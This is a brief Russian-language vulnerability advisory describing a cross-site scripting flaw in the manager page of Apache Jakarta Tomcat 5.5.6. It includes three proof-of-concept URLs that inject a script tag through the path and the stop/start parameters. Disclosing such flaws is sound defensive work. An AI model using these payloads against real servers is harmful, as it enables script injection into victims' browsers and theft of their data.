Программа: Apache Jakarta Tomcat 5.5.6 

Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к важным данным пользователей.
Уязвимость обнаружена при обработке данных в сценарии manager Tomcat. Удаленный пользователь может создать специально сформированный URL и выполнить произвольный HTML сценарий в браузере жертвы. 

Пример: 

http://[target]:8080/manager/html/ <script>alert("Hallo")</script>
http://[target]:8080/manager/html/ stop ?path=<script>alert("Hallo")</script>
http://[target]:8080/manager/html/ start?path=<script>alert("Hallo")</script>

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии